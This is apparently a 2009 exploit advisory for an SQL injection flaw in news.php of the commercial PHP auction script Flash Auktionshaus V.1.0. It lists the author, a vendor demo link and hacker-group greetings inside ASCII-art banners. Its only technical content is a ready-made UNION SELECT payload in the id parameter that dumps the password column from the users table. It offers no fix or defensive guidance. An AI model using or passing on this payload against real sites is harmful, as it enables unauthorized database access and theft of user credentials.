# Exploit Title: Flash Auktionshaus SQL Injection news.php # Date: found 22. Oktober 2009 um 01:28 details on my blog http://4004securityproject.wordpress.com/2009/10/22/flash-auktionshaus-sql-injection-news-php/ # Author: Easy Laster # Software Link: http://xmedien.e-ee.de/auktionflash/ # Version: V.1.0 # Tested on: Windows #more Web vulnerability on my blog http://4004securityproject.wordpress.com ######################################################################## ##Flash Auktionshaus SQL Injection news.php ## ######################################################################## ######################################################################## ## _ _ _ _ ## ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ## ##| _| -_| .'| |___| | | _| -_| _| | -_| _| ## ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ## ## ## ######################################################################## ########################################################################## #Script: Flash Auktionshaus news.php # #Vulnerabilities [ SQL Injection ] # #Language: [ PHP ] # #Download: [ buy this script ] # #Founder: [ ea$y laster ] # #Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] # #[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] # #Price: [ Commercial License EUR 89.00 € # #DEMO : http://xmedien.e-ee.de/auktionflash/ # ############################################################################# #http://[demo].de/news.php?id=-1+union+select+1,2,password,4,5+from+users+--# #############################################################################